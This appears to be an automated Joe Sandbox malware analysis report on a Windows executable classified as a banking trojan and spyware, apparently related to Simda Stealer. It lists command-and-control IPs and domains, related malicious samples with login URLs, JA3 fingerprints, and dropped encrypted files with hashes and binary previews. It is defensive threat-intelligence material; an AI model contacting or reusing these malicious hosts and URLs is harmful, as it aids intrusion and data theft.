                                                                                                                                                                                                                  154.85.183.50
                                                                                                                                                                                                                  		qegyval.comSeychelles
                                                                                                                                                                                                                  		134548DXTL-HKDXTLTseungKwanOServiceHKfalse
                                                                                                                                                                                                                  64.225.91.73
                                                                                                                                                                                                                  		galynuh.comUnited States
                                                                                                                                                                                                                  		14061DIGITALOCEAN-ASNUSfalse
                                                                                                                                                                                                                  52.34.198.229
                                                                                                                                                                                                                  		lygyvuj.comUnited States
                                                                                                                                                                                                                  		16509AMAZON-02USfalse
                                                                                                                                                                                                                  99.83.170.3
                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                  		16509AMAZON-02UStrue
                                                                                                                                                                                                                  75.2.71.199
                                                                                                                                                                                                                  		puzylyp.comUnited States
                                                                                                                                                                                                                  		16509AMAZON-02USfalse
                                                                                                                                                                                                                  103.150.10.48
                                                                                                                                                                                                                  		gtm-sg-6l13ukk0m05.qu200.comunknown
                                                                                                                                                                                                                  		59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGfalse
                                                                                                                                                                                                                  23.253.46.64
                                                                                                                                                                                                                  		gahyqah.comUnited States
                                                                                                                                                                                                                  		19994RACKSPACEUSfalse
                                                                                                                                                                                                                  199.191.50.83
                                                                                                                                                                                                                  		galyqaz.comVirgin Islands (BRITISH)
                                                                                                                                                                                                                  		40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                                                                                                                                                  13.248.169.48
                                                                                                                                                                                                                  		pupydeq.comUnited States
                                                                                                                                                                                                                  		16509AMAZON-02USfalse
                                                                                                                                                                                                                  103.224.212.210
                                                                                                                                                                                                                  		lyxynyx.comAustralia
                                                                                                                                                                                                                  		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                                                                                                                                                                                  76.223.67.189
                                                                                                                                                                                                                  		qexyhuv.comUnited States
                                                                                                                                                                                                                  		16509AMAZON-02USfalse
                                                                                                                                                                                                                  18.208.156.248
                                                                                                                                                                                                                  		pupycag.comUnited States
                                                                                                                                                                                                                  		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                  208.100.26.245
                                                                                                                                                                                                                  		lyvyxor.comUnited States
                                                                                                                                                                                                                  		32748STEADFASTUSfalse
                                                                                                                                                                                                                  199.59.243.227
                                                                                                                                                                                                                  		77026.bodis.comUnited States
                                                                                                                                                                                                                  		395082BODIS-NJUSfalse
                                                                                                                                                                                                                  103.224.182.252
                                                                                                                                                                                                                  		vofycot.comAustralia
                                                                                                                                                                                                                  		133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                                                                                                                                                                                  91.195.240.19
                                                                                                                                                                                                                  		parkingpage.namecheap.comGermany
                                                                                                                                                                                                                  		47846SEDO-ASDEfalse
                                                                                                                                                                                                                  162.255.119.102
                                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                                  		22612NAMECHEAP-NETUStrue
                                                                                                                                                                                                                  188.114.97.3
                                                                                                                                                                                                                  		lysyvan.comEuropean Union
                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  44.221.84.105
                                                                                                                                                                                                                  		gadyciz.comUnited States
                                                                                                                                                                                                                  		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                  154.212.231.82
                                                                                                                                                                                                                  		gadyniw.comSeychelles
                                                                                                                                                                                                                  		133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKfalse
                                                                                                                                                                                                                  188.114.96.3
                                                                                                                                                                                                                  		qegyhig.comEuropean Union
                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                  85.17.31.122
                                                                                                                                                                                                                  		gatyfus.comNetherlands
                                                                                                                                                                                                                  		60781LEASEWEB-NL-AMS-01NetherlandsNLfalse
                                                                                                                                                                                                                  178.162.203.226
                                                                                                                                                                                                                  		unknownGermany
                                                                                                                                                                                                                  		28753LEASEWEB-DE-FRA-10DEtrue

                                                                                                                                                                                                                  General Information

                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                  Analysis ID:1553852
                                                                                                                                                                                                                  Start date and time:2024-11-11 18:49:30 +01:00
                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                  Overall analysis duration:0h 10m 32s
                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                  Number of analysed new started processes analysed:27
                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                  Number of injected processes analysed:13
                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                  Sample name:UMwpXhA46R.exe
                                                                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                                                                  Original Sample Name:ef7eacbab6cd35771675717a0a84939f529c1ac4.exe
                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                  Classification:mal100.bank.troj.spyw.expl.evad.winEXE@13/61@2294/28
                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                  • Successful, ratio: 99%
                                                                                                                                                                                                                  • Number of executed functions: 92
                                                                                                                                                                                                                  • Number of non-executed functions: 238
                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                  • Found application associated with file extension: .exe

                                                                                                                                                                                                                  Warnings

                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 2.23.209.160, 2.23.209.182, 2.23.209.176, 2.23.209.177, 2.23.209.183, 2.23.209.185, 2.23.209.130, 2.23.209.158, 2.23.209.189, 2.23.209.181, 2.23.209.135, 2.23.209.193, 2.23.209.187, 2.23.209.133, 20.42.65.92, 2.23.209.140, 2.23.209.149, 52.168.117.173, 52.182.143.212, 2.23.209.150, 2.23.209.144, 2.23.209.141, 13.89.179.12, 2.23.209.179
                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, www.bing.com.edgekey.net, onedsblobprdcus15.centralus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com
                                                                                                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                  • VT rate limit hit for: UMwpXhA46R.exe

                                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                  12:51:07API Interceptor10x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                  12:51:29API Interceptor432216x Sleep call for process: svchost.exe modified

                                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                                  IPs

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  3.94.10.341fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • lymyxid.com/login.php
                                                                                                                                                                                                                  arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • lymyxid.com/login.php
                                                                                                                                                                                                                  Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • lygynud.com/login.php
                                                                                                                                                                                                                  WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • lygynud.com/login.php
                                                                                                                                                                                                                  Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • lygynud.com/login.php
                                                                                                                                                                                                                  uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • lymyxid.com/login.php
                                                                                                                                                                                                                  7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • lymyxid.com/login.php
                                                                                                                                                                                                                  AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                  • ctdtgwag.biz/wikoehfueo
                                                                                                                                                                                                                  E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                                  • ctdtgwag.biz/xyrpanl
                                                                                                                                                                                                                  Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                  • gvijgjwkh.biz/maxlthgls
                                                                                                                                                                                                                  64.190.63.1361fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • ww16.vofycot.com/login.php?sub1=20241112-0450-17b0-8984-b4b272a22199
                                                                                                                                                                                                                  arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • ww16.vofycot.com/login.php?sub1=20241112-0433-44f6-9e59-dc72adbb0086
                                                                                                                                                                                                                  Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • ww16.vofycot.com/login.php?sub1=20241112-0425-1706-a2c8-02526792f211
                                                                                                                                                                                                                  WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • ww16.vofycot.com/login.php?sub1=20241112-0426-044d-b465-1d078f2f97da
                                                                                                                                                                                                                  Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • ww16.vofycot.com/login.php?sub1=20241112-0413-3653-b9c7-4bbc444bdc48
                                                                                                                                                                                                                  uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • ww16.vofycot.com/login.php?sub1=20241112-0408-09d4-8f1c-1de8890559b5
                                                                                                                                                                                                                  7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • ww16.vofycot.com/login.php?sub1=20241112-0352-0187-b8de-fd2bfab34f87
                                                                                                                                                                                                                  http://afilias-grs.netGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • ww1.afilias-grs.net/search/tsc.php?ses=ogcIVruNZX5wQoGiwEz0Cq5PlN8zbbyp9Yq8dJFsn9poLX66IqkUhYVtAoJVb1AVRMXAtM65AaycMcjRMYAhdanh4H9VedEkUUDj7sc72cCMrn4Aq1jlr5Cf3Gyi37eSFszvqR2Z1jp_ezLSbToMVTMtkjDzo_LiuICxKqxU1ViilTwANTlr5WASZHBeFyN9K17m6E3E5ah97JIYIlDvt1EGmzUgNAGCXUTJBPD90zmFYlGgcsrWr9x5sRfW2BLGGMk8_iHKL0K_Iui8SV31UmfqbTFkZA14T8LZNQ7C4KUa_tBEFu-HS0j_I6Y4wh0p5m1bWRgdCQ_T3rEK468UUMrsAoUYxdvCJFLI5qVszq4s5qkp2l0O3xrQTkw&cv=2
                                                                                                                                                                                                                  OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • ww16.vofycot.com/login.php?sub1=20240908-1854-132f-8c2f-134916a1e9d0
                                                                                                                                                                                                                  5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • ww16.vofycot.com/login.php?sub1=20240908-1700-25c9-bc2e-507729a41b57

                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  pupycag.com1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 18.208.156.248
                                                                                                                                                                                                                  arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 18.208.156.248
                                                                                                                                                                                                                  Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 18.208.156.248
                                                                                                                                                                                                                  WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 18.208.156.248
                                                                                                                                                                                                                  Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 18.208.156.248
                                                                                                                                                                                                                  uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 18.208.156.248
                                                                                                                                                                                                                  7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 18.208.156.248
                                                                                                                                                                                                                  OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 18.208.156.248
                                                                                                                                                                                                                  5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 18.208.156.248
                                                                                                                                                                                                                  uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 18.208.156.248
                                                                                                                                                                                                                  pupydeq.com1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 13.248.169.48
                                                                                                                                                                                                                  arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 13.248.169.48
                                                                                                                                                                                                                  Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 13.248.169.48
                                                                                                                                                                                                                  WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 13.248.169.48
                                                                                                                                                                                                                  Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 13.248.169.48
                                                                                                                                                                                                                  uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 13.248.169.48
                                                                                                                                                                                                                  7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 13.248.169.48
                                                                                                                                                                                                                  OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 13.248.169.48
                                                                                                                                                                                                                  5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 13.248.169.48
                                                                                                                                                                                                                  uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 13.248.169.48

                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  NBS11696US1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 64.190.63.136
                                                                                                                                                                                                                  arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 64.190.63.136
                                                                                                                                                                                                                  Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 64.190.63.136
                                                                                                                                                                                                                  WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 64.190.63.136
                                                                                                                                                                                                                  Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 64.190.63.136
                                                                                                                                                                                                                  uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 64.190.63.136
                                                                                                                                                                                                                  7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 64.190.63.136
                                                                                                                                                                                                                  sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 209.87.95.110
                                                                                                                                                                                                                  jklarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 64.190.7.239
                                                                                                                                                                                                                  x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                  • 64.190.99.77
                                                                                                                                                                                                                  AMAZON-AESUS1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 44.221.84.105
                                                                                                                                                                                                                  arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 44.221.84.105
                                                                                                                                                                                                                  Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 44.221.84.105
                                                                                                                                                                                                                  WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 44.221.84.105
                                                                                                                                                                                                                  Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 44.221.84.105
                                                                                                                                                                                                                  uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 44.221.84.105
                                                                                                                                                                                                                  7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 44.221.84.105
                                                                                                                                                                                                                  sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 44.210.24.233
                                                                                                                                                                                                                  Attachment-914011545-004.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 54.144.73.197
                                                                                                                                                                                                                  http://swctch.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 52.2.182.50
                                                                                                                                                                                                                  CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 106.15.232.163
                                                                                                                                                                                                                  arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 106.15.232.163
                                                                                                                                                                                                                  Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 106.15.232.163
                                                                                                                                                                                                                  WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 106.15.232.163
                                                                                                                                                                                                                  Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 106.15.232.163
                                                                                                                                                                                                                  uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 106.15.232.163
                                                                                                                                                                                                                  7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 106.15.232.163
                                                                                                                                                                                                                  sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 120.79.48.98
                                                                                                                                                                                                                  sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 8.188.166.167
                                                                                                                                                                                                                  mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 47.93.221.102

                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e191fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                                                  • 99.83.170.3
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  • 75.2.71.199
                                                                                                                                                                                                                  arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                                                  • 99.83.170.3
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  • 75.2.71.199
                                                                                                                                                                                                                  Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                                                  • 99.83.170.3
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  • 75.2.71.199
                                                                                                                                                                                                                  WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                                                  • 99.83.170.3
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  • 75.2.71.199
                                                                                                                                                                                                                  Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                                                  • 99.83.170.3
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  • 75.2.71.199
                                                                                                                                                                                                                  uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                                                  • 99.83.170.3
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  • 75.2.71.199
                                                                                                                                                                                                                  7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                                                  • 99.83.170.3
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  • 75.2.71.199
                                                                                                                                                                                                                  11315781264#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                                                  • 99.83.170.3
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  • 75.2.71.199
                                                                                                                                                                                                                  P52mX04112024145925383.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                                                  • 99.83.170.3
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  • 75.2.71.199
                                                                                                                                                                                                                  Factura Honorarios 2024-11-04.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                                                  • 99.83.170.3
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  • 75.2.71.199

                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                  C:\Program Files (x86)\Windows Defender\galynuh.com

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):593
                                                                                                                                                                                                                  Entropy (8bit):7.626935561277827
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                                  MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                                  SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                                  SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                                  SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:....tp.-$|e.V...(.m.y;.;..>...O`.<.]..&@...0..P....:.(...{i1r....H...i......=$.<.v&1...%e..r..(}b;.U...A.f..K8S.9IM.R.....!.._.....N':.. ..s..!IX..ZK..q..T..v.%.....0...fn.........b...../...\..O8....M...i.ZF.r.C.)~qO..T..{...x..g.......$.t.m;..|.R.33...; ...N.#..rN.A.c.D.w.?0.%D.i..1...5..[.,......ir.Z.`.....+.8..Y.....'>./l..qZ..#1F..F...=./,.&.....e.Q..$.mZZAZ........P...=T.u.H]^n|..h_s.n....r..I..U.T..%N$.B..jj.\..*...Z.';-.....5...#..u.P..k...\..:.'..l8n<C.s.SJ..4....%OE.L2..Ir....U...d.CP....m<.TG?.u..iLj*....H.H...?G..*O..tE..9..%.<+<......_.w..*S....

                                                                                                                                                                                                                  C:\Program Files (x86)\Windows Defender\galyqaz.com

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):271
                                                                                                                                                                                                                  Entropy (8bit):7.211107091222298
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:NBQM2NMx5ZkFjA7/B4lTosFLcWdg+oFQy749du8szDLIalm:NB0wQFs7/B4vOWKvFnWduRPtlm
                                                                                                                                                                                                                  MD5:83EB358D93A58A5515D37544731C6C51
                                                                                                                                                                                                                  SHA1:EED72863382F3F9845DC020DCDCF4C7656D619F3
                                                                                                                                                                                                                  SHA-256:32D53F571A785269AA1D589299B1E02697B49130CF3059E8071A08A9A946B67E
                                                                                                                                                                                                                  SHA-512:9EEFF293218D0A5BEE5932473C582D3EEA21A20DDA4AFB0D44DF38831DA01A62EAFC41FA1F15EE7DFB18379A4EF4B0327D88A78DDFF270C8714245E64C88E356
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:....tp..pqa.....(.m.y;....U..V).l.X...+....+......h.+..f..<....^...g......ph.0.oa....w%.z..G5"tX./....d..y5:;.}.Sp=.Q....$.....I..B;p..V).....~.F......:..X..{.%.....yA..Bn......Y..d.....&.J.S..P/....I...n.EI.r....cg..^...`...?.."...Z.q..c.x.z<..sD..j-..q&...

                                                                                                                                                                                                                  C:\Program Files (x86)\Windows Defender\pupydeq.com

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):114
                                                                                                                                                                                                                  Entropy (8bit):6.479691220248167
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                                  MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                                  SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                                  SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                                  SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:...[..A.9l.....|.e.&'.*.-K...P-.p.R...9L....%........'.=...bto2..X...f.....@pg.>..ac...69..z...}/<.MF9...h..

                                                                                                                                                                                                                  C:\Program Files (x86)\Windows Defender\puzylyp.com

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):59521
                                                                                                                                                                                                                  Entropy (8bit):7.972501252180373
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:ZQimNJq4lkHqWmHwEyivDfOoG5tN06d+12:ZRukFmHy4rG5tU2
                                                                                                                                                                                                                  MD5:523E24CD4C310923DF35FF33E2AD7020
                                                                                                                                                                                                                  SHA1:C15892132EA1D2E62567721871DA5F69F3F3E342
                                                                                                                                                                                                                  SHA-256:A246E3D514A5F96F1CE3FCEEFA455575BB656B0743710CBF4C9E50186D7794CE
                                                                                                                                                                                                                  SHA-512:556B8D6A853DCA7D66340B00ED72081CD2871F1F7355C14F8ABDD0F4179A5A46774E5A7B439BA7661D4F28180BFFE646C89BFBB751E1BF152525835C4D3FA55C
                                                                                                                                                                                                                  Malicious:false
